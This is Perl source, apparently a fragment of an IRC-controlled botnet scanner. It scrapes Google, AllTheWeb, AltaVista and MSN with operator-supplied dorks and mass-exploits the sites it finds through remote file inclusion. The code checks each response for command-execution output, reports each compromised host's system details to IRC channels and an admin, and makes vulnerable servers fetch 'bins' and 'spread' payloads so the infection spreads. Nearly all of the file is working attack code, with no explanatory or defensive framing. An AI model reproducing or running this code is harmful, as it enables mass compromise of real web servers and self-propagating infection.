sleep(1);
display( $dsp,”PRIVMSG $channel :10Scan Started From Dork: 4$dork” );
my @google = &googlet($dork);
push( my @tot, @google );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :1GOOGLE15 ” . scalar(@tot). ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :1Google10 Finished From Dork:14 $dork ” );
}
my $test  = “http://” . $site . $bug . $id . “?”;
my $test  = “http://” . $site . $bug . $bot . “?”;
my $test  = “http://” . $site . $bug . $id . “?”;
my $print = “http://” . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://” . $site . $bug . $bins . “?”;
my $test2 = “http://” . $site . $bug . $spread . “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :!google\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;

my @google = &googlet($dork);
push( my @tot, @google );
my @puliti = &unici(@tot);
display( $dsp,”PRIVMSG $channel :1GOOGLE15 ” . scalar(@tot). ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :1Google10 Finished From Dork:14 $dork ”
);
}
my $test  = “http://” . $site . $bug . $id . “?”;
my $test  = “http://” . $site . $bug . $bot . “?”;
my $test  = “http://” . $site . $bug . $id . “?”;
my $print = “http://” . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://” . $site . $bug . $bins . “?”;
my $test2 = “http://” . $site . $bug . $spread. “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 1GOOGLE5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
my @alltheweb = &alltheweb($dork);
push( my @tot, @alltheweb );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :2ALLTHEWEB15 ” . scalar(@tot) . ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :2ALLTHEWEB10 Finished From Dork:14 $dork ” );
}
my $test  = “http://” . $site . $bug . $id . “?”;
my $test  = “http://” . $site . $bug . $bot . “?”;
my $test  = “http://” . $site . $bug . $id . “?”;
my $print = “http://” . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 2ALLTHEWEB15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://” . $site . $bug . $bins . “?”;
my $test2 = “http://” . $site . $bug . $spread . “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 2ALLTHEWEB5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
my @alt   = &altavista($dork);
push( my @tot, @alt );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :4ALTAVISTA15 ” . scalar(@tot) . ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :4ALTAVISTA10 Finished From Dork:14 $dork ” );
}
my $test  = “http://” . $site . $bug . $id . “?”;
my $test  = “http://” . $site . $bug . $bot . “?”;
my $test  = “http://” . $site . $bug . $id . “?”;
my $print = “http://” . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 4ALTAVISTA15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://” . $site . $bug . $bins . “?”;
my $test2 = “http://” . $site . $bug . $spread. “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 4ALTAVISTA5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
}
else {
if (fork) {
exit;
}
else {
my $bug       = $1;
my $dork      = $2;
my $contatore = 0;
my %hosts;
my @mlist = &msn($dork);
push( my @tot, @mlist );
my @puliti = &unici(@tot);
display( $dsp,
“PRIVMSG $channel :6MSN15 ” . scalar(@tot) . ” 10-15 ” . scalar(@puliti) . ” 10 From:14 $dork” );
my $uni = scalar(@puliti);

foreach my $site (@puliti) {
$contatore++;
if ( $contatore % 100 == 0 ) {
}
if ( $contatore == $uni – 1 ) {
display( $dsp,”PRIVMSG $channel :6MSN10 Finished From Dork:14 $dork ” );
}
my $test  = “http://” . $site . $bug . $id . “?”;
my $test  = “http://” . $site . $bug . $bot . “?”;
my $test  = “http://” . $site . $bug . $id . “?”;
my $print = “http://” . $site . $bug . $printcmd . “?”;
my $req   = HTTP::Request->new( GET => $test );
my $ua    = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /netcat/ && $re =~ /uid=/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 6MSN15 $bug14 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:4 OFF 10Os:7 $os 10Link:5 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:7 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:7 $free 10, Used:7 $used 10, Total:7 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:7 $up”
);
display( $dsp,”PRIVMSG $channel :10ID:7 $id1”
);
display( $dsp,”PRIVMSG $channel :10PWD:7 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:7 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:7 $sof1”
);
display( $dsp,”PRIVMSG $channel :10Ip Addr:7 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:7 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode:4 OFF 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode:4 OFF 1Os: $os Link: $print”
);
my $test2 = “http://” . $site . $bug . $bins . “?”;
my $test2 = “http://” . $site . $bug . $spread . “?”;
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
}
}
elsif ( $re =~ /netcat/ ) {
my $hs = geths($print);
$hosts{$hs}++;
if ( $hosts{$hs} == “1″ ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
sleep(4);
display( $dsp,”PRIVMSG $channel :10Exploiting… 6MSN5 $bug4 $dork ”
);
display( $dsp,”PRIVMSG $channel :10Safemode:3 ON 10Os:3 $os 10Link:3 $print”
);
display( $dsp,”PRIVMSG $channel :10Uname -a:3 $un”
);
display( $dsp,”PRIVMSG $channel :10HDD: Free:3 $free 10Used:3 $used 10Total:3 $all”
);
display( $dsp,”PRIVMSG $channel :10Uptime:3 $up”
);
display( $dsp,”PRIVMSG $channel :10PWD:3 $pwd1”
);
display( $dsp,”PRIVMSG $channel :10PHP Vers:3 $php1”
);
display( $dsp,”PRIVMSG $channel :10Software:3 $sof1”
);
display( $dsp,”PRIVMSG $channel :10IP Addr:3 $ip1”
);
display( $dsp,”PRIVMSG $channel :10Hostname:3 $name1”
);
display( $dsp,”PRIVMSG $admin :1Safemode: 3ON 1Os: $os Link: $print”
);
display( $dsp,”PRIVMSG $chanres :1Safemode: 3ON 1Os: $os Link: $print”
);
}
}
}
}
}
exit;
}
}

}

sub display() {
if ( $#_ == ’1′ ) {
my $dsp = $_[0];
print $dsp “$_[1]\n”;
}
else {
print $dsp “$_[0]\n”;
}
}

sub os() {
my $site = $_[0];
my $Res  = query($site);

while ( $Res =~ m/<br>uname -a:(.+?)\<br>/g ) {
$un = $1;
}
while ( $Res =~ m/<br>uptime:(.+?)\<br>/g ) {
$up = $1;
}
while ( $Res =~ m/<br>id:(.+?)\<br>/g ) {
$id1 = $1;
}
while ( $Res =~ m/<br>pwd:(.+?)\<br>/g ) {
$pwd1 = $1;
}
while ( $Res =~ m/<br>php:(.+?)\<br>/g ) {
$php1 = $1;
}
while ( $Res =~ m/<br>software:(.+?)\<br>/g ) {
$sof1 = $1;
}
while ( $Res =~ m/<br>server-ip:(.+?)\<br>/g ) {
$ip1 = $1;
}
while ( $Res =~ m/<br>server-name:(.+?)\<br>/g ) {
$name1 = $1;
}
while ( $Res =~ m/<br>os:(.+?)\<br>/g ) {
$os = $1;
}
while ( $Res =~ m/<br>free:(.+?)\<br>/g ) {
$free = $1;
}
while ( $Res =~ m/<br>used:(.+?)\<br>/g ) {
$used = $1;
}
while ( $Res =~ m/<br>total:(.+?)\<br>/g ) {
$all = $1;
}
}

sub googlet {
my @dominios = (
“ae”, “com.ar”, “at”, “com.au”, “be”, “com.br”,
“ca”, “ch”, “cl”, “de”, “dk”, “eu”, “sa”, “id”, “tr”, “pl”, “uk”, “gov”, “my”, “mx”
);
my @country =
( “AE”, “AR”, “AT”, “AU”, “BE”, “BR”, “CA”, “CH”, “CL”, “DE”, “DK” );
my @lst;
my $key = key( $_[0] );
my $c   = 0;
foreach my $i (@dominios) {
my @lista = google( $i, $key, $country[$c] );
push( @lst, @lista );
$c++;
}
return @lst;
}

sub google() {
my @lst;
my $i       = $_[0];
my $key     = $_[1];
my $country = $_[2];
for ( $b = 0 ; $b <= 100 ; $b += 100 ) {
my $Go =
(     “www.google.” . $i
. “/search?hl=en&q=”
. key($key)
. “&num=100&start=”
. $b
. “&meta=cr%3Dcountry”
. $country );
my $Res = query($Go);
while ( $Res =~ m/<a href=\”?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /google/ ) {
my $k    = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}

sub alltheweb() {
my @lst;
my $key = $_[0];
my $i   = 0;
my $pg  = 0;
for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
my $all =
( “http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=”
. key($key) . “&o=”
. $i );
my $Res = query($all);
while ( $Res =~ m/<span class=\”?resURL\”?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}

sub altavista() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $AlT =
(“http://www.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=”.key($key).”&stq=”.$b);
my $Res = query($AlT);
while ( $Res =~ m/<span class=ngrn>(.+?)\//g ) {
if ( $1 !~ /altavista/ ) {
my $k = $1;
$k =~ s/<//g;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
if   ( $Res =~ /target=\”_self\”>Succ/ ) { }
else                                     { return @lst; }
}
return @lst;
}

sub searchs() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 100 ; $b++ ) {
my $sc =
( “http://www.search.com/search?q=” . key($key) . “&nav=” . $b );
my $Res = query($sc);
while ( $Res =~ m/<a href=\”?http:\/\/(.+?)/g ) {
my $k    = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}

sub msn() {
my @lst;
my $key = $_[0];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $MsN =
(     “http://search.live.com/results.aspx?q=”
. key($key)
. “&first=”
. $b
. “&FORM=PERE” );
my $Res = query($MsN);
while ( $Res =~ m/<a href=\”?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /msn|live/ ) {
my $k    = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}

sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= “/”;
$link .= “/”;
$hdir .= “/”;
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
}

sub geths() {
my $host = $_[0];
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}

sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\”/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
}

sub end() {
$string = $_[0];
$string .= “/”;
$string =~ s/\/\//\//;
while ( $string =~ /\/\// ) {
$string =~ s/\/\//\//;
}
return ($string);
}

sub query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host  = $url;
my $query = $url;
my $page  = “”;
$host  =~ s/href=\”?http:\/\///;
$host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ( $query eq “” ) { $query = “/”; }
eval {
my $sock = IO::Socket::INET->new(
PeerAddr => “$host”,
PeerPort => “80″,
Proto    => “tcp”
) or return;
print $sock
“GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n”;
my @r = <$sock>;
$page = “@r”;
close($sock);
};
return $page;
}

sub get_link() {
my $file_print = $_[1];
my $link       = $_[0];
my $host       = $_[0];
my $host_dir   = $_[0];
my @links;
$host_dir =~ s/(.*)\/[^\/]*$/\1/;
$host     =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host_dir = &end($host_dir);
$host     = &end($host);
$link     = &end($host);
push( @links, $link, $host, $host_dir );
open( $file, ‘>>’, $file_print );
print $file “$link\n$host_dir\n$host\n”;
close($file);
return @links;
}

sub unici {
my @unici = ();
my %visti = ();
foreach my $elemento (@_) {
$elemento =~ s/\/+/\//g;
next if $visti{$elemento}++;
push @unici, $elemento;
}
return @unici;
}